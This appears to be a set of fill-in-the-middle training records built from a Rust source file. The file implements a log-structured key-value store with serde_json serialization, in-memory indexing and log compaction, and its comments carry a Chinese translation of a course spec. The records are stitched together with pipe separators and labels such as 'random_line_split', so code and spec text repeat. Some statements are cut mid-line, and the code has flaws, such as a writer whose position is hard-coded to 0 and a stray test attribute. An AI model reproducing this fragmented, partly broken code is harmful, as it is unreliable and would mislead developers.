注意:Rust 中的“错误处理”仍在发展和改进中。本课程目前使用 [`failure`](https://docs.rs/failure/0.1.5/failure/) 库定义错误类型更容易。虽然 `failure` 设计不错,但它的使用[不是最佳实践](https://github.com/rust-lang-nursery/rust-cookbook/issues/502#issue-387418261)。Rust 专家可能会开发出更好的错误处理方式。
在后面的课程中有可能不会一直使用 `failure`。于此同时,它也是一个不错的选择,它能用于学习 Rust 错误处理的演进以及优化。
### 部分 2:log 的作用和原理
现在我们终于要开始从磁盘读写来实现一个真正的数据库。我们将使用 [serde](https://serde.rs/) 来把 "set" 和 "rm" 指令序列化为字符串,然后用标准的文件 I/O 接口来写到硬盘上。
下面这些是 `kvs` 最基本的日志行文:
* "set"
* 用户调用 `kvs set mykey myvalue`
* `kvs` 创建 set 指令包含的值,其中有 key 和 value
* 然后,程序将指令序列化为 `String`
* 然后,把序列化的指令追加到日志文件中
* 如果成功了,则以错误码 0 静默地退出
* 如果失败了,就打印错误,并返回非 0 地错误代码并退出
* "get"
* 用户调用指令:`kvs get mykey`
* kvs 每次读取一条指令,将相应受影响的 key 和文件偏移量记录到内存的 map 中,即 key -> 日志指针
* 然后,检查 map 中的日志指针
* 如果失败,则打印“Key not found”,并以代码 0 退出
* 如果成功
* 它将指令日志反序列化得到最后的记录中的 key 和值
* 然后将结果打印到标准输出,并以代码 0 退出
* "rm"
* 用户调用指令 `kvs rm mykey`
* 和 get 指令一样,kvs 读取整条日志来在内存中构建索引
* 然后,它检查 map 中是否存在给定的 key
* 如果不存在,就返回“Key not found”
* 如果成功,将会创建对应的 rm 指令,其中包含了 key
* 然后将指令序列化后追加到日志中
* 如果成功,则以错误码 0 静默退出
日志是提交到数据库的事务记录。通过在启动时,“重建”(replaying)日志中的记录,我们就可以重现数据库在某个时间点的特定状态。
在这个迭代中,你可以将键的值直接存储在内存中(因此在重启或重建时是不会从日志中读取内容的)。在后面的迭代中,只需将日志指针(文件偏移量)存储到日志中。
### 部分 3:log 的写入
我们将从 set 开始。接下来将会有很多步骤。但大部分都比较容易实现,你可以通过运行 `cli_*` 相关测试用例来验证你的实现。
`serde` 是一个大型库,有许多功能选项,支持多种序列化格式。基本的序列化和反序列化只需要对结构体进行合适的注解,然后调用一个函数将序列化后的内容写入 `String` 或者 `Write` 流。
你需要选择一种序列化格式。并确定你需要的属性 —— 你是否需要性能优先?你希望以纯文本形式读取日志内容吗?这都在于你如何配置,但你记得在代码中写好注释。
还有其他因素要考虑一下:系统在哪设置缓冲,以及哪些地方需要?缓冲后续的影响是什么?何时打开和关闭文件句柄?有哪些支持的命令?`KvStore` 的生命周期是什么?
你调用的一些 api 可能会失败,并返回错误类型的 `Result`。你需要确保调用函数会返回你自己设定的错误类型的 `Result`,并用 `?` 向上传递。
类似于 rm 命令,我们希望在把命令写入日志之前,还要检查 key 是否存在。因为两种场景需要区分开,所以可以使用 enum 类型的变体来统一所有命令。`serde` 可以完美地与枚举一起使用。
你现在可以实现 set 和 rm 命令了,重点放在 set / rm 对应的测试用例上,也可以阅读下一节的 get 命令实现。记住这两个命令并加以实现,会对你很有帮助。选择权在你。
### 部分 4:log 的读取
现在该实现 get 了。在这一部分中,你不需要把日志指针存储在索引中,而将其放到下一节进行实现。这一节我们只需在启动时,读取日志中的所有命令,执行它们将每个键值对保存在内存中。然后根据需要从内存中读取。
应该一次性把日志内容全部读取到内存中并通过 map 类型来重现数据吗;需要在某个时候读取一条日志从而重现 map 中的某条数据吗?应该在序列化、反序列化之前将其从文件系统中读取到 buffer 中吗?想想你使用内存的方式。考虑一下与内核交互是否是从 I/O 流读取数据。
记住,"get" 可能获取不到值,这种情况下,需要特殊处理。这里,我们的 API 返回 `None`,然后客户端打印一个特定的消息,并以零代码退出。
读取日志有一个复杂点,你在编写 set 时,可能已经想到了:如何区分日志中的记录?也就是说,如何终止读取,何时开始读取下一条记录?需要这样实现吗?也许 serde 将直接从 I/O 流中序列化一条记录,并在操作完后停止读取,将游标停留在正确的位置,以便读取后续的记录。也许 serde 在检查到两条背靠背(back-to-back)的记录时会报错。也许你需要插入额外的信息来区分每个记录的长度,也有可能有其他方式。
_现在要实现 “get” 了_
### 部分 5:在索引中存储 log 的指针
此时,除压缩数据相关的测试以外,其他测试应该都是通过的。接下来的步骤是一些性能优化和存储优化。当你实现它们时,需要注意它们的意义是什么?
正如我们前面描述的那样,我们所实现的数据库是在内存中维护所有的 key 索引。这个索引映射到字符串指针(值内容),而非 key 本身的内容。
这个更改就需要我们可以从任意偏移量处读取日志。想一想,这将怎样影响我们对文件的处理。
如果在前面的步骤中,你选择将字符串直接存在内存中,那现在需要调整代码为存储日志指针的方式,并根据需要从磁盘中加载内容。
### 部分 6:KvStore 的有状态和无状态
请记住,我们的项目不仅是一个库,也可作为命令行程序。它们有些不一样:kvs 命令行程序向磁盘提交一个更改,然后就退出了(无状态);KvStore 会将更改提交到磁盘,然后常驻内存以服务后续的查询(有状态)。
你的 KvStore 是有状态还是无状态呢?
可以让你的 KvStore 的索引常驻内存中,这样就无需在每次调用时重新执行所有的日志指令。
### 部分 7:log 的压缩
到这里,数据库运行是正常的,但日志会无限增长。这对其他数据库可能没啥影响,但对于我们正在构建的数据库 —— 我们需要尽量减少磁盘的占用。
因此,最后一步就是压缩日志了。需要考虑到随着日志的增长,可能有多个指令日志对同一个键操作。还要考虑到,对于同一个键,只有最近一次的日志的更改才对其值有影响:
索引序号 | 指令
|:---- |:--- |
| 0 | ~~Command::Set("key-1", "value-1a")~~ |
| 20 | Command::Set("key-2", "value-2") |
| | ... |
| 100 | Command::Set("key-1", "value-1b") |
在这个例子中,索引 0 的日志很明显是冗余的,因此不需要对其存储。日志压缩其实就是重新构建日志并且消除冗余:
索引序号 | 指令
|:---- |:--- |
| 0 | Command::Set("key-2", "value-2") |
| | ... |
| 99 | Command::Set("key-1", "value-1b") |
这是基本的压缩算法的使用:
如何重建日志取决于你。考虑一下这个问题:最原始的方法是什么?需要多少内存?压缩日志所需的最小拷贝量是多少?能实时压缩吗?如果压缩失败,怎样保证数据完整性?
到目前为止,我们一直致力于“日志”的处理,但实际上,数据库的数据存储在多个日志文件中是很常见的。如果你将日志拆分到多个文件中,你可能会发现压缩日志更容易。
给数据库实现日志压缩。
恭喜!你已经编写了一个功能齐全的数据库了。
如果你很好奇,你可以将你实现的数据库的性能与其他数据库(如 sled、bitcask、badger 或 RicksDB)进行性能对比。你可能喜欢研究它们实现的架构,将其与你自己的架构对比,以及架构的不同对性能有何影响。接下来的几个项目将为你提供优化的机会。
写的很棒,朋友。可以休息一下了。
*/ | } else { | random_line_split |
kv.rs | //! 通过 [indexmap](https://github.com/bluss/indexmap) 实现简单的 KV 数据库
//! 为了防止 data race,将 IndexMap 用 Arc 进行包装
//! 具体实现可以参考:https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/src/kv.rs
use super::util::HandyRwLock;
use crate::{KvsError, Result};
use indexmap::IndexMap;
use serde::{Deserialize, Serialize};
use serde_json::Deserializer;
use std::{
collections::{BTreeMap, HashMap},
ffi::OsStr,
fs::File,
io::{BufReader, BufWriter, Read, Seek, SeekFrom, Write},
ops::Range,
path::{Path, PathBuf},
sync::{Arc, RwLock},
};
/// 键值对存储在日志文件中 todo
struct KVStore {
/// 当将键设置为值时,kvs 将 set 命令写入硬盘中的有序日志中,
/// 然后将该日志对应的指针(文件偏移量)指向键和内容,并存储在内存索引中。
/// 类似地,当删除一个键时,kvs 将 rm 命令写入日志,然后从内存索引中删除该键。
/// 当使用 get 命令检索键的值时,它检索索引,如果找到了,就从对应的日志指针上加载命令,执行命令并返回结果。
///
/// kvs 启动时,就会按从旧到新的顺序从日志中遍历并执行命令,内存索引也会对应的重建。
///
/// 当日志条数达到给定阈值时,kvs 会其压缩为一个新日志,删除冗余日志以回收磁盘空间。
///
/// 注意,kvs 项目既是一个无状态命令行程序,也是一个包含有状态 KVStore 类型的库:
/// 对于 CLI,使用 KVStore 类型将加载索引,执行命令,然后退出;对于库使用,它将加载索引,然后执行多个命令,维护索引状态,直到它被删除。
/// ref: https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/README.md#project-spec
path: PathBuf,
// 数字到文件的映射
readers: HashMap<u64, BufReaderWithPos<File>>,
// 当前用于写的日志文件
writer: BufWriterWithPos<File>,
// 存在内存中的索引
index: BTreeMap<String, CommandPos>,
// inner: Arc<RwLock<IndexMap<Vec<u8>, Vec<u8>>>>,
/// 记录当前所写入的文件标号
current_gen: u64,
/// 记录过期/无效的(可被删除的)值的字节数量
uncompacted: u64,
}
#[derive(Debug)]
struct BufWriterWithPos<W: Write + Seek> {
writer: BufWriter<W>,
pos: u64,
}
impl<W: Write + Seek> BufWriterWithPos<W> {
fn new(mut inner: W) -> Result<Self> {
let pos = inner.seek(SeekFrom::Current(0));
Ok(BufWriterWithPos {
writer: BufWriter::new(inner),
pos: 0,
})
}
}
impl<W: Write + Seek> Write for BufWriterWithPos<W> {
fn write(&mut self, buf: &[u8]) -> std::io::Result<usize> {
let len = self.writer.write(buf)?;
self.pos += len as u64;
Ok(len)
}
fn flush(&mut self) -> std::io::Result<()> {
self.writer.flush()
}
}
struct BufReaderWithPos<R: Read + Seek> {
reader: BufReader<R>,
pos: u64,
}
impl<R: Read + Seek> BufReaderWithPos<R> {
fn new(mut inner: R) -> Result<Self> {
let pos = inner.seek(SeekFrom::Current(0))?;
Ok(BufReaderWithPos {
reader: BufReader::new(inner),
pos,
})
}
}
// 将目录中的文件列表按名字进行排序,以便得到有序的日志文件列表
fn sorted_gen_list(path: PathBuf) -> Result<Vec<u64>> {
let mut gen_list: Vec<u64> = std::fs::read_dir(&path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file() && path.extension() == Some("log".as_ref()))
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.trim_end_matches(".log"))
.map(str::parse::<u64>)
})
.flatten()
.collect();
gen_list.sort_unstable();
Ok(gen_list)
}
fn log_path(dir: &Path, gen: u64) -> PathBuf {
dir.join(format!("{}.log", gen))
}
/// 通过文件序号,从对应的文件中读取指令并生成对应的索引加载到内存中(BTreeMap)
fn load(
gen: u64,
reader: &mut BufReaderWithPos<File>,
index: &mut BTreeMap<String, CommandPos>,
) -> Result<u64> {
// 确定从文件的某个位置开始读
let mut pos = reader.seek(SeekFrom::Start(0))?;
let mut stream = Deserializer::from_reader(reader).into_iter::<Command>();
// 通过压缩的手段可节省的字节数
let mut uncompacted = 0;
while let Some(cmd) = stream.next() {
// 匹配到下一条指令所对应的 offset
let new_pos = stream.byte_offset() as u64;
match cmd? {
Command::Set { key, .. } => {
if let Some(old_cmd) = index.insert(key, (gen, pos..new_pos).into()) {
uncompacted += old_cmd.len;
}
}
// 删除
Command::Remove { key } => {
if let Some(old_cmd) = index.remove(&key) {
uncompacted += old_cmd.len;
}
// 为何加上了指令的长度?todo
uncompacted += new_pos - pos;
}
}
pos = new_pos;
}
Ok(uncompacted)
}
#[derive(Debug, Deserialize, Serialize)]
enum Command {
Set { key: String, value: String },
Remove { key: String },
}
/// 定义支持的指令/日志
impl Command {
fn set(key: String, value: String) -> Self {
Command::Set { key, value }
}
fn remove(key: String) -> Self {
Command::Remove { key }
}
}
/// 命令位置
#[derive(Debug)]
struct CommandPos {
/// 日志文件序号
gen: u64,
/// 日志在一个文件中的偏移量
pos: u64,
/// 日志的长度。一个指令就算是一条日志
len: u64,
}
impl From<(u64, Range<u64>)> for CommandPos {
fn from((gen, range): (u64, Range<u64>)) -> Self {
CommandPos {
gen,
pos: range.start,
len: range.end - range.start,
}
}
}
impl<R: Seek + Read> Seek for BufReaderWithPos<R> {
fn seek(&mut self, pos: SeekFrom) -> std::io::Result<u64> {
self.pos = self.reader.seek(pos)?;
Ok(self.pos)
}
}
impl<R: Seek + Read> Read for BufReaderWithPos<R> {
fn read(&mut self, buf: &mut [u8]) -> std::io::Result<usize> {
let len = self.reader.read(buf)?;
self.pos += len as u64;
Ok(len)
}
}
impl KVStore {
/// 基于一个路径启动一个 KvStore 实例。
/// 如果路径不存在,则创建
fn open(path: impl Into<PathBuf>) -> Result<Self> {
// 打开目录,查看目录中的日志文件列表,将其加载进 kvs
let using_path = path.into();
std::fs::create_dir_all(&using_path)?;
let mut readers = HashMap::new();
// 索引以 btree map 的形式存储在内存中
let mut index: BTreeMap<String, CommandPos> = BTreeMap::new();
let gen_list = sorted_gen_list(using_path.clone())?;
let mut uncompacted = 0;
for &gen in &gen_list {
let mut reader = BufReaderWithPos::new(File::open(log_path(&using_path, gen))?)?;
uncompacted += load(gen, &mut reader, &mut index)?;
readers.insert(gen, reader);
}
let current_gen = gen_list.last().unwrap_or(&0) + 1;
let writer = new_log_file(&using_path, current_gen, &mut readers)?;
Ok(KVStore {
path: using_path.clone(),
readers,
writer,
index,
current_gen,
uncompacted,
})
}
/// 设定键值对
/// 1.序列化指令,刷入文件中;2.索引写入内存
fn set(&mut self, k: String, v: String) -> Result<()> {
let cmd = Command::set(k, v);
let pos = self.writer.pos;
serde_json::to_writer(&mut self.writer, &cmd)?;
self.writer.flush()?;
// 索引写入内存 todo
if let Command::Set { key, .. } = cmd {
if let Some(old_cmd) = self
.index
.insert(key, (self.current_gen, pos..self.writer.pos).into())
{
self.uncompacted += old_cmd.len;
}
}
Ok(())
}
/// 读取值
/// 如果key存在则返回值,不存在,返回 None
fn get(&mut self, k: String) -> Result<Option<String>> {
if let Some(cmd_pos) = self.index.get(&k) {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("Cannot find log reader");
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
let cmd_reader = reader.take(cmd_pos.len);
if let Command::Set { value, .. } = serde_json::from_reader(cmd_reader)? {
Ok(Some(value))
} else {
Err(KvsError::UnsupportCmdType)
}
} else {
Ok(None)
}
}
/// 查询 key 是否存在,如果存在,则记录 cmd 到日志,然后删除文件中的数据,再索引索引
fn delete(&mut self, k: String) -> Result<()> {
if self.index.contains_key(&k) {
let rm_cmd = Command::remove(k.clone());
serde_json::to_writer(&mut self.writer, &rm_cmd)?;
self.writer.flush()?;
if let Command::Remove { key } = rm_cmd {
let old_cmd = self.index.remove(&key).expect("rm key error.");
self.uncompacted += old_cmd.len;
}
Ok(())
} else {
Err(KvsError::KeyNotFound)
}
}
/// 压缩过期的不必要的数据指令
fn compact(&mut self) -> Result<()> {
let compaction_gen = self.current_gen + 1;
self.current_gen += 2;
self.writer = self.new_log_file(self.current_gen)?;
let mut compaction_writer = self.new_log_file(compaction_gen)?;
let mut new_pos = 0;
for cmd_pos in &mut self.index.values_mut() {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("cann't find log reader");
if reader.pos != cmd_pos.pos {
reader.seek(SeekFrom::Start | mut entry_reader = reader.take(cmd_pos.len);
let len = std::io::copy(&mut entry_reader, &mut compaction_writer)?;
*cmd_pos = (compaction_gen, new_pos..new_pos + len).into();
new_pos += len;
}
compaction_writer.flush()?;
// 删除过期的日志文件
let stale_gens: Vec<_> = self
.readers
.keys()
.filter(|&&gen| gen < compaction_gen)
.cloned()
.collect();
for stale_gen in stale_gens {
self.readers.remove(&stale_gen);
std::fs::remove_file(log_path(&self.path, stale_gen))?;
}
self.uncompacted = 0;
Ok(())
}
fn new_log_file(&mut self, gen: u64) -> Result<BufWriterWithPos<File>> {
new_log_file(&self.path, gen, &mut self.readers)
}
}
// 读取一个目录下的文件
fn read_dir(path: &str) -> Result<Vec<String>> {
// Rust 实现浏览文件
let dirs: Vec<String> = std::fs::read_dir(path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file())
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.to_string())
})
.collect();
dbg!(&dirs);
Ok(dirs)
}
fn create_dir(path: &str) -> Result<bool> {
std::fs::create_dir_all(path)?;
Ok(true)
}
/// 日志文件的创建
fn new_log_file(
path: &Path,
gen: u64,
readers: &mut HashMap<u64, BufReaderWithPos<File>>,
) -> Result<BufWriterWithPos<File>> {
let path = log_path(&path, gen);
let writer = BufWriterWithPos::new(
std::fs::OpenOptions::new()
.create(true)
.write(true)
.append(true)
.open(&path)?,
)?;
readers.insert(gen, BufReaderWithPos::new(File::open(&path)?)?);
Ok(writer)
}
#[cfg(test)]
mod tests {
use std::{fmt::Result, str::FromStr};
use super::*;
#[test]
fn test_store1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".into();
st.set(cache_key.clone(), "hello org".to_string());
assert_eq!(st.get(cache_key.to_string()).unwrap(), Some("hello org".to_string()));
}
#[test]
fn test_load1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".to_string();
dbg!(st.get(cache_key.to_string()).unwrap());
}
#[test]
// fn test_store_delete() {
// let mut st = KVStore::new();
// let cache_key: Vec<u8> = "org_1001_info".as_bytes().into();
// st.set(cache_key.clone(), "hello org".as_bytes().into());
// assert_eq!(st.delete(&cache_key), Some("hello org".as_bytes().into()));
// assert_eq!(st.get(&cache_key), None);
// }
#[test]
fn test_sorted_gen_list() {
let res = sorted_gen_list(PathBuf::from("./"));
dbg!(&res);
}
#[test]
fn test_serde() {
// 通过 serde_json 可以实现“流”方式的贪婪匹配对象(反序列化)
let data = b"[10] [1] [2]";
let de = serde_json::Deserializer::from_slice(data);
let mut stream = de.into_iter::<Vec<i32>>();
dbg!(stream.byte_offset()); // 0
dbg!(stream.next()); // Some([10])
dbg!(stream.byte_offset()); // 4
dbg!(stream.next()); // Some([1])
dbg!(stream.byte_offset()); // 8
dbg!(stream.next()); // Some([2])
dbg!(stream.byte_offset()); // 12
}
#[test]
fn test_read_dir() {
let res = read_dir("./");
assert!(res.is_ok());
}
#[test]
fn test_create_dir() {
// 执行时,`./` 指的是项目根目录
let res = create_dir("./test-dir");
assert!(res.is_ok());
}
#[test]
fn test_new_log_file() {
let mut hs: HashMap<u64, BufReaderWithPos<File>> = HashMap::new();
let res = new_log_file(Path::new("./data"), 0, &mut hs);
dbg!(res);
}
#[test]
fn test_command_pos() {
// Into trait 的使用和了解
let c1: CommandPos = (1, 2..17).into();
dbg!(c1);
}
}
/*
>* 资料来源:https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/README.md#project-spec
### 部分 1:错误处理
在这个项目中,I/O 错误会导致代码执行失败。因此,在完全实现数据库之前,我们还需要确定一件
至关重要的事:错误处理策略。
Rust 的错误处理很强大,但需要以合适的方式使用多个样板文件,而对于这个项目,failure 库将提供便捷的错误处理工具。
failure 库的指南中描述了几种错误处理模式。
我们选择其中一种策略,然后在库中可以定义自己的错误类型,也可以导入其他 Error。这个策略对应的错误类型将会在项目中的 Result 中使用,
可以使用 `?` 操作符把其他库中的错误类型转换为自己库的错误类型。
这样,为 Result 定义一个含有错误类型的类型别名,编码时就不需要到处输入 Result<T, YourErrorType>,而可以简单的输入 Result。这是一种非常常见的 Rust 模式。
最后,使用 use 语句将这些类型导入到代码中,然后将 main 函数的签名的返回值部分修改为 `Result<()>`。
运行 `cargo check` 可以用编译器检查错误,然后修复这些错误。现在可以先使用 `panic!()` 来结束 `main` 函数,从而通过编译。
在前进之前,先确定好你的错误处理策略。
与之前的项目一样,你可以创建用于占位的数据结构和方法,以便跑通测试用例。现在你定义一个错误类型,这很简单。然后在所有需要编译测试用例的地方添加 panic(`cargo test --no-run`)。
注意:Rust 中的“错误处理”仍在发展和改进中。本课程目前使用 [`failure`](https://docs.rs/failure/0.1.5/failure/) 库定义错误类型更容易。虽然 `failure` 设计不错,但它的使用[不是最佳实践](https://github.com/rust-lang-nursery/rust-cookbook/issues/502#issue-387418261)。Rust 专家可能会开发出更好的错误处理方式。
在后面的课程中有可能不会一直使用 `failure`。于此同时,它也是一个不错的选择,它能用于学习 Rust 错误处理的演进以及优化。
### 部分 2:log 的作用和原理
现在我们终于要开始从磁盘读写来实现一个真正的数据库。我们将使用 [serde](https://serde.rs/) 来把 "set" 和 "rm" 指令序列化为字符串,然后用标准的文件 I/O 接口来写到硬盘上。
下面这些是 `kvs` 最基本的日志行文:
* "set"
* 用户调用 `kvs set mykey myvalue`
* `kvs` 创建 set 指令包含的值,其中有 key 和 value
* 然后,程序将指令序列化为 `String`
* 然后,把序列化的指令追加到日志文件中
* 如果成功了,则以错误码 0 静默地退出
* 如果失败了,就打印错误,并返回非 0 地错误代码并退出
* "get"
* 用户调用指令:`kvs get mykey`
* kvs 每次读取一条指令,将相应受影响的 key 和文件偏移量记录到内存的 map 中,即 key -> 日志指针
* 然后,检查 map 中的日志指针
* 如果失败,则打印“Key not found”,并以代码 0 退出
* 如果成功
* 它将指令日志反序列化得到最后的记录中的 key 和值
* 然后将结果打印到标准输出,并以代码 0 退出
* "rm"
* 用户调用指令 `kvs rm mykey`
* 和 get 指令一样,kvs 读取整条日志来在内存中构建索引
* 然后,它检查 map 中是否存在给定的 key
* 如果不存在,就返回“Key not found”
* 如果成功,将会创建对应的 rm 指令,其中包含了 key
* 然后将指令序列化后追加到日志中
* 如果成功,则以错误码 0 静默退出
日志是提交到数据库的事务记录。通过在启动时,“重建”(replaying)日志中的记录,我们就可以重现数据库在某个时间点的特定状态。
在这个迭代中,你可以将键的值直接存储在内存中(因此在重启或重建时是不会从日志中读取内容的)。在后面的迭代中,只需将日志指针(文件偏移量)存储到日志中。
### 部分 3:log 的写入
我们将从 set 开始。接下来将会有很多步骤。但大部分都比较容易实现,你可以通过运行 `cli_*` 相关测试用例来验证你的实现。
`serde` 是一个大型库,有许多功能选项,支持多种序列化格式。基本的序列化和反序列化只需要对结构体进行合适的注解,然后调用一个函数将序列化后的内容写入 `String` 或者 `Write` 流。
你需要选择一种序列化格式。并确定你需要的属性 —— 你是否需要性能优先?你希望以纯文本形式读取日志内容吗?这都在于你如何配置,但你记得在代码中写好注释。
还有其他因素要考虑一下:系统在哪设置缓冲,以及哪些地方需要?缓冲后续的影响是什么?何时打开和关闭文件句柄?有哪些支持的命令?`KvStore` 的生命周期是什么?
你调用的一些 api 可能会失败,并返回错误类型的 `Result`。你需要确保调用函数会返回你自己设定的错误类型的 `Result`,并用 `?` 向上传递。
类似于 rm 命令,我们希望在把命令写入日志之前,还要检查 key 是否存在。因为两种场景需要区分开,所以可以使用 enum 类型的变体来统一所有命令。`serde` 可以完美地与枚举一起使用。
你现在可以实现 set 和 rm 命令了,重点放在 set / rm 对应的测试用例上,也可以阅读下一节的 get 命令实现。记住这两个命令并加以实现,会对你很有帮助。选择权在你。
### 部分 4:log 的读取
现在该实现 get 了。在这一部分中,你不需要把日志指针存储在索引中,而将其放到下一节进行实现。这一节我们只需在启动时,读取日志中的所有命令,执行它们将每个键值对保存在内存中。然后根据需要从内存中读取。
应该一次性把日志内容全部读取到内存中并通过 map 类型来重现数据吗;需要在某个时候读取一条日志从而重现 map 中的某条数据吗?应该在序列化、反序列化之前将其从文件系统中读取到 buffer 中吗?想想你使用内存的方式。考虑一下与内核交互是否是从 I/O 流读取数据。
记住,"get" 可能获取不到值,这种情况下,需要特殊处理。这里,我们的 API 返回 `None`,然后客户端打印一个特定的消息,并以零代码退出。
读取日志有一个复杂点,你在编写 set 时,可能已经想到了:如何区分日志中的记录?也就是说,如何终止读取,何时开始读取下一条记录?需要这样实现吗?也许 serde 将直接从 I/O 流中序列化一条记录,并在操作完后停止读取,将游标停留在正确的位置,以便读取后续的记录。也许 serde 在检查到两条背靠背(back-to-back)的记录时会报错。也许你需要插入额外的信息来区分每个记录的长度,也有可能有其他方式。
_现在要实现 “get” 了_
### 部分 5:在索引中存储 log 的指针
此时,除压缩数据相关的测试以外,其他测试应该都是通过的。接下来的步骤是一些性能优化和存储优化。当你实现它们时,需要注意它们的意义是什么?
正如我们前面描述的那样,我们所实现的数据库是在内存中维护所有的 key 索引。这个索引映射到字符串指针(值内容),而非 key 本身的内容。
这个更改就需要我们可以从任意偏移量处读取日志。想一想,这将怎样影响我们对文件的处理。
如果在前面的步骤中,你选择将字符串直接存在内存中,那现在需要调整代码为存储日志指针的方式,并根据需要从磁盘中加载内容。
### 部分 6:KvStore 的有状态和无状态
请记住,我们的项目不仅是一个库,也可作为命令行程序。它们有些不一样:kvs 命令行程序向磁盘提交一个更改,然后就退出了(无状态);KvStore 会将更改提交到磁盘,然后常驻内存以服务后续的查询(有状态)。
你的 KvStore 是有状态还是无状态呢?
可以让你的 KvStore 的索引常驻内存中,这样就无需在每次调用时重新执行所有的日志指令。
### 部分 7:log 的压缩
到这里,数据库运行是正常的,但日志会无限增长。这对其他数据库可能没啥影响,但对于我们正在构建的数据库 —— 我们需要尽量减少磁盘的占用。
因此,最后一步就是压缩日志了。需要考虑到随着日志的增长,可能有多个指令日志对同一个键操作。还要考虑到,对于同一个键,只有最近一次的日志的更改才对其值有影响:
索引序号 | 指令
|:---- |:--- |
| 0 | ~~Command::Set("key-1", "value-1a")~~ |
| 20 | Command::Set("key-2", "value-2") |
| | ... |
| 100 | Command::Set("key-1", "value-1b") |
在这个例子中,索引 0 的日志很明显是冗余的,因此不需要对其存储。日志压缩其实就是重新构建日志并且消除冗余:
索引序号 | 指令
|:---- |:--- |
| 0 | Command::Set("key-2", "value-2") |
| | ... |
| 99 | Command::Set("key-1", "value-1b") |
这是基本的压缩算法的使用:
如何重建日志取决于你。考虑一下这个问题:最原始的方法是什么?需要多少内存?压缩日志所需的最小拷贝量是多少?能实时压缩吗?如果压缩失败,怎样保证数据完整性?
到目前为止,我们一直致力于“日志”的处理,但实际上,数据库的数据存储在多个日志文件中是很常见的。如果你将日志拆分到多个文件中,你可能会发现压缩日志更容易。
给数据库实现日志压缩。
恭喜!你已经编写了一个功能齐全的数据库了。
如果你很好奇,你可以将你实现的数据库的性能与其他数据库(如 sled、bitcask、badger 或 RicksDB)进行性能对比。你可能喜欢研究它们实现的架构,将其与你自己的架构对比,以及架构的不同对性能有何影响。接下来的几个项目将为你提供优化的机会。
写的很棒,朋友。可以休息一下了。
*/
| (cmd_pos.pos))?;
}
let | conditional_block |
kv.rs | //! 通过 [indexmap](https://github.com/bluss/indexmap) 实现简单的 KV 数据库
//! 为了防止 data race,将 IndexMap 用 Arc 进行包装
//! 具体实现可以参考:https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/src/kv.rs
use super::util::HandyRwLock;
use crate::{KvsError, Result};
use indexmap::IndexMap;
use serde::{Deserialize, Serialize};
use serde_json::Deserializer;
use std::{
collections::{BTreeMap, HashMap},
ffi::OsStr,
fs::File,
io::{BufReader, BufWriter, Read, Seek, SeekFrom, Write},
ops::Range,
path::{Path, PathBuf},
sync::{Arc, RwLock},
};
/// 键值对存储在日志文件中 todo
struct KVStore {
/// 当将键设置为值时,kvs 将 set 命令写入硬盘中的有序日志中,
/// 然后将该日志对应的指针(文件偏移量)指向键和内容,并存储在内存索引中。
/// 类似地,当删除一个键时,kvs 将 rm 命令写入日志,然后从内存索引中删除该键。
/// 当使用 get 命令检索键的值时,它检索索引,如果找到了,就从对应的日志指针上加载命令,执行命令并返回结果。
///
/// kvs 启动时,就会按从旧到新的顺序从日志中遍历并执行命令,内存索引也会对应的重建。
///
/// 当日志条数达到给定阈值时,kvs 会其压缩为一个新日志,删除冗余日志以回收磁盘空间。
///
/// 注意,kvs 项目既是一个无状态命令行程序,也是一个包含有状态 KVStore 类型的库:
/// 对于 CLI,使用 KVStore 类型将加载索引,执行命令,然后退出;对于库使用,它将加载索引,然后执行多个命令,维护索引状态,直到它被删除。
/// ref: https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/README.md#project-spec
path: PathBuf,
// 数字到文件的映射
readers: HashMap<u64, BufReaderWithPos<File>>,
// 当前用于写的日志文件
writer: BufWriterWithPos<File>,
// 存在内存中的索引
index: BTreeMap<String, CommandPos>,
// inner: Arc<RwLock<IndexMap<Vec<u8>, Vec<u8>>>>,
/// 记录当前所写入的文件标号
current_gen: u64,
/// 记录过期/无效的(可被删除的)值的字节数量
uncompacted: u64,
}
#[derive(Debug)]
struct BufWriterWithPos<W: Write + Seek> {
writer: BufWriter<W>,
pos: u64,
}
impl<W: Write + Seek> BufWriterWithPos<W> {
fn new(mut inner: W) -> Result<Self> {
let pos = inner.seek(SeekFrom::Current(0));
Ok(BufWriterWithPos {
writer: BufWriter::new(inner),
pos: 0,
})
}
}
impl<W: Write + Seek> Write for BufWriterWithPos<W> {
fn write(&mut self, buf: &[u8]) -> std::io::Result<usize> {
let len = self.writer.write(buf)?;
self.pos += len as u64;
Ok(len)
}
fn flush(&mut self) -> std::io::Result<()> {
self.writer.flush()
}
}
struct BufReaderWithPos<R: Read + Seek> {
reader: BufReader<R>,
pos: u64,
}
impl<R: Read + Seek> BufReaderWithPos<R> {
fn new(mut inner: R) -> Result<Self> {
let pos = inner.seek(SeekFrom::Current(0))?;
Ok(BufReaderWithPos {
reader: BufReader::new(inner),
pos,
})
}
}
// 将目录中的文件列表按名字进行排序,以便得到有序的日志文件列表
fn sorted_gen_list(path: PathBuf) -> Result<Vec<u64>> {
let mut gen_list: Vec<u64> = std::fs::read_dir(&path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file() && path.extension() == Some("log".as_ref()))
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.trim_end_matches(".log"))
.map(str::parse::<u64>)
})
.flatten()
.collect();
gen_list.sort_unstable();
Ok(gen_list)
}
fn log_path(dir: &Path, gen: u64) -> PathBuf {
dir.join(format!("{}.log", gen))
}
/// 通过文件序号,从对应的文件中读取指令并生成对应的索引加载到内存中(BTreeMap)
fn load(
gen: u64,
reader: &mut BufReaderWithPos<File>,
